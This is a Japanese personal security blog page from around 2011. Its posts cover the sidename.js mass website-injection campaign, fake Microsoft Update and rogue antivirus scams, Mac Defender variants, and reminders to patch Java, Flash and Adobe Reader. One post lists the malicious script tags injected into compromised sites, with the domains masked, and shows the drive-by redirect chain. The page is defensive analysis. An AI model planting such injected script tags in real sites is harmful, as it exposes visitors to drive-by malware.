ここから本文です
サイトの改ざん、コンピュータウイルス・セキュリティ、検索エンジンYahoo!/Googleらへん...☆彡

書庫全体表示

記事検索
検索

全112ページ

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]

[ 前のページ | 次のページ ]

sidename.jsインジェクション 大規模な正規サイト改ざん攻撃?

 セキュリティ会社Armorize Technologiesというところが、LizaMoon改ざんとは異なるタイプの大規模な正規サイトの改ざんについて報告してます。
Mass Meshing Injection: sidename.js ongoing (Armorize Malware Blog)
新たなインジェクション攻撃、すでに3万サイトが感染か (japan.internet.com)

 正規サイトに不正なJavaScriptタグが挿入され、飛び先となってるJavaScriptファイル(sidename.js)の置き場所もまたハッキングされた正規サイトとのこと。記事では、JavaScriptファイルが置かれてる正規サイトのURLアドレスリストものっていて、中にJPドメインな日本のサイトもいくつか含まれてますなぁ〜。

 実際に突撃アクセスしてみたところ、ブラウザ内部で↓のような感じで強制的に誘導されていきました。ウイルスの感染手段は、「Java」「Adobe Reader」「Microsoft系」の3系統の脆弱性を悪用するドライブバイ・ダウンロード攻撃です。脆弱性はすでに修正されてるので、ちゃんと「Java」(JRE)と「Adobe Reader」を最新版に更新して、「Windows Update」してれば何ら問題なしっ! ;)
http://(正規サイトX)/
 ↓
http://(正規サイトY)/sidename.js
 ↓
http://(攻撃サイト).ce.ms/showthread.php?t= 〜
 ↓
http://(攻撃サイト).ru/forumthrea.php?tp= 〜 (Exploit Kit)
http://(攻撃サイト).ru/d.php?f=16&e= 〜 (Malware)
 攻撃スタイルとして、去年から今もずっと沈黙してるGumblar.x(ガンブラー)とも違う雰囲気。

 もし仮に更新をさぼってるダメダメパソコンだと、こんなウイルスが強制的に発動し感染しちゃう恐れがあります。何するんだろねコレ・・・?

VirusTotal
www.virustotal.com/file-scan/report.html?id=fcf519c051704ce91812a1945d924d3fc2aa8c46ccde7088a7a173193b58042d-1308316024
Anubis
anubis.iseclab.org/?action=result&task_id=1f4f16c5ff7402914cd9ee5fca2e39ccf&format=html

 ↑は記事を書く数時間前に回収してきたもの、↓は記事を書きつつ回収してきたもの。 :)

VirusTotal
www.virustotal.com/file-scan/report.html?id=a7d1a1b4418f7ff15427c79a257c2463c1166eb3e6508843271aa4681e323053-1308315550
Anubis
anubis.iseclab.org/?action=result&task_id=158b764b444cc492429de04a704098a86&format=html


[追記...]
 挿入されるJavaScriptコードはこんな感じかい?
<script type="text/javascript" src="http://[DOMAIN]/adv.php"></script>
<script type="text/javascript" src="http://[DOMAIN]/cssminibar.js"></script>
<script type="text/javascript" src="http://[DOMAIN]/counter.js"></script>
<script type="text/javascript" src="http://[DOMAIN]/wpqonfig.php"></script> x
<script type="text/javascript" src="http://[DOMAIN]/wpcomplate.php"></script> x
<script type="text/javascript" src="http://[DOMAIN]/confdb.php"></script>
<script type="text/javascript" src="http://[DOMAIN]/facebook.php"></script>
<script type="text/javascript" src="http://[DOMAIN]/js.php"></script>
<script type="text/javascript" src="http://[DOMAIN]/jquery.js"></script>
<script type="text/javascript" src="http://[DOMAIN]/ajax.php"></script>
<script type="text/javascript" src="http://[DOMAIN]/java.php"></script>
<script type="text/javascript" src="http://[DOMAIN]/search.php"></script>

開くトラックバック(0)

Microsoft Updateの偽サイトで偽セキュリティソフトを配布中!

 セキュリティ企業Sophos(ソフォス)によると、インチキ偽セキュリティソフトを配布する偽ウイルススキャンのページにMicrosoft Updateを装ったタイプのものが見つかったそーな。
Fake anti-virus cloaks itself to appear to be Microsoft Update (Sophos Naked Security)

 調べてみると、Windows UpdateやらMicrosoft Updateの偽サイトをブラウザに表示し勘違いさせて、手動で実行ファイル(ウイルス)を起動してもらう手法ってのは過去にもあったよーで。 ;)
またも「Microsoft Update」に偽サイト、トロイの木馬を誘導 (ITmedia News)
Windows Updateの偽サイト出現、フィッシングの可能性 (ITPro)

 んで、その偽Microsoft Updateのサイトに出会ったのでスクリーンショットを公開。重大な更新として『Windows Malicious Software Removal Tool (Critical Update) - February 2011 (KB990831)』なるものを導入しろと言うてます。

  http://farm6.static.flickr.com/5239/5820736592_4a4e8ab246_z.jpg

 この画面になる直前には、ホンモノにも存在する緑色の進行バーがアニメーションする演出もちゃんと用意されとります。実際にはチェックしてないので、5秒ぐらいで終わっちゃうけど。

  http://farm6.static.flickr.com/5185/5820185179_0081169fc6.jpg

 そもそもWindows Vista/7環境だと、Windows UpdateはOSそのものに統合されちゃってるので普通は出会わない場面ですな。ただ、Windows XP環境だと、Internet ExplorerブラウザでMicrosoft Updateのページへアクセスしてもらう形なのでダマし効果はあるんでしょう。日本語ではなく英語表示、URLアドレスがマイクロソフトじゃない、と怪しいところはあるワケですが、ただでさえ全体的な雰囲気がマイクロソフトばりばりなデザインのなので、うっかりダマされちゃうん? :)

開くトラックバック(0)

Java、Flash Player、Adobe Reader、Windows Update ちゃんと更新してる?

 ここ最近、Java(JRE) と Flash Player のとても重要なセキュリティアップデートが行なわれてます。6月8日時点の最新バージョンは下のような感じでしょうかね。 ;)

Java Version 6 Update 26
Adobe Flash Player 10.3.181.23(Internet Explorer用), 10.3.181.22(Firefox/Opera用)
  [追記 ... 6月15日に 10.3.181.26 へセキュリティアップデートあり]
Adobe Reader 10.0.1
  [追記 ... 6月15日に 10.1 へセキュリティアップデートあり]
・ (Windows Update)

 これらは導入した覚えがなくても、パソコンを買った段階で最初からインストールされてる場合も多いです。仮に導入されてたら、早く最新版へ更新しとかないとウイルスに感染します。実際に更新をさぼってる人のパソコンが、知らないうちに勝手にインストールされるインチキ偽システム修復ツールの被害に巻き込まれてるようです。 :(

○ Windows XP Recovery
○ Windows 7 Recovery
○ Windows Vista Recovery

   http://farm3.static.flickr.com/2091/5802817088_f81bfe2e23.jpg

   http://farm6.static.flickr.com/5150/5802817084_2292d0879e.jpg

 何か先月5月あたりから感染騒動でスゴイみたいで、ハードディスクうんぬんエラーがあるとデタラメ警告を示して、”有償版”を買うよう脅迫してきます。

   http://farm6.static.flickr.com/5032/5802628069_bbe2b3bfbe.jpg

 被害にあった人の話で、具体的なウイルス対策ソフトの商品名を挙げ、導入してたのにすり抜けて殺られた〜!、と嘆いてるのを見かけましたが当たり前の話。ウイルス対策ソフトは、感染原因となった”更新さぼり”なんぞ知ったこっちゃなし。ちゃんと更新してあれば、ウイルス対策ソフトの出番以前に、そもそもこのインチキツールが強制感染する事態がほぼ100%起こりません。 :)

「アップデート」を実行しよう【プラグイン編】 (So-net セキュリティ通信)
ホームページからの感染対策 (サイバークリーンセンター)


[6月15日追記...]
 セキュリティアップデートが行われたのでバージョン情報に加筆。

https://s.yimg.jp/images/sicons/affiliate16.gif  私のおすすめ:
ハイ、私は更新をさぼっていて感染したおバカな人間です。

開くトラックバック(0)

Apple vs Mac Defender 検出対応のいたちごっこスタート

イメージ 1

 Appleのセキュリティアップデートによって駆除機能が備わったことで、検出対応をめぐる「cat and mouse game」(いたちごっこ)がスタートしたようで。インチキ偽ウイルス対策ソフト「Mac Defender」ファミリの感染キャンペーンで現在投入されてる最新亜種は「Mac Shield」という名前になってます。

MAC Defender
 ↓
Mac Security (MacSecurity)
 ↓
Mac Protector (MacProtector)
 ↓
Mac Guard (MacGuard)
 ↓
Mac Shield (MacShield)
https://s.yimg.jp/images/sicons/affiliate16.gif  私のおすすめ:
Macターゲットの偽セキュリティソフト関連記事

開くトラックバック(0)

偽セキュリティソフト「Security Shield」を進化させてみた

 最近はあんまり感染の話を聞かなくなったインチキ偽セキュリティソフト「Security Shield」を購入すると、先月あたりからパワーアップ版が導入される、というお話があったので試してみやした。

 まずは「Security Shield」を入手して感染します。買え買え〜ポップアップや激しい操作妨害が行なわれ、無視し続けてるとIEブラウザが起動して、海外の過激なポルノサイトを見せつけてきます。さっそく(ネット上で公開されてる)レジストコードをホイホイッと入力。 ;)

   http://farm3.static.flickr.com/2705/5786229666_05ac2a40d2.jpg

 するってーと、「Updating to Full version...」とな?

   http://farm3.static.flickr.com/2165/5786229670_26f877079e.jpg

 どーん! 「Security Shield」にとって代わって「Security Shield Pro 2011」なるものが新しくインストールされてしまいました。右上のロゴ以外は全体的な雰囲気がぜんぜん別モノです。こっちは妨害処理とかはなく、×ボタンでプログラム自体はちゃんと終了するなど非常におとなしい。さらに買え買え〜とはならないようで。

   http://farm3.static.flickr.com/2537/5786229672_80cda3dc2b.jpg

 「Security Shield Pro」のフォルダはこんな感じになっていて、SSP.exeが本体。サイズがでかい *.dat はいちおうウイルス定義データという名目なんでしょうが中身を見る限りゴミ。

    http://farm3.static.flickr.com/2188/5786229674_559f6637a1.jpg

 アンインストール用らしい「unins000.exe」が用意されてるので、ホントに削除してくれるのか試してみたところ、関連ファイル群はキレイに削除されましたが、レジストリにゴミは残していきました。パソコン起動時に「Security Shield Pro」を起動させる設定ですな。
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
SSP (C:\Users\ユーザー名\AppData\Local\Security Shield Pro\SSP.exe)

開くトラックバック(0)

全112ページ

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]

[ 前のページ | 次のページ ]

Yahoo!ブログからのお知らせ

noooo_spam
noooo_spam
非公開 / 非公開
人気度
Yahoo!ブログヘルプ - ブログ人気度について
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
検索 検索
友だち(5)
  • who
  • Kerupani129
  • Cookies
  • 物知りマン
  • ★ピサロ★
友だち一覧

よしもとブログランキング

もっと見る
本文はここまでですこのページの先頭へ

[PR]お得情報

ふるさと納税サイト『さとふる』
11/30まで5周年記念キャンペーン中!
Amazonギフト券1000円分当たる!
数量限定!イオンおまとめ企画
「無料お試しクーポン」か
「値引きクーポン」が必ず当たる!

その他のキャンペーン

みんなの更新記事
前へ 次へ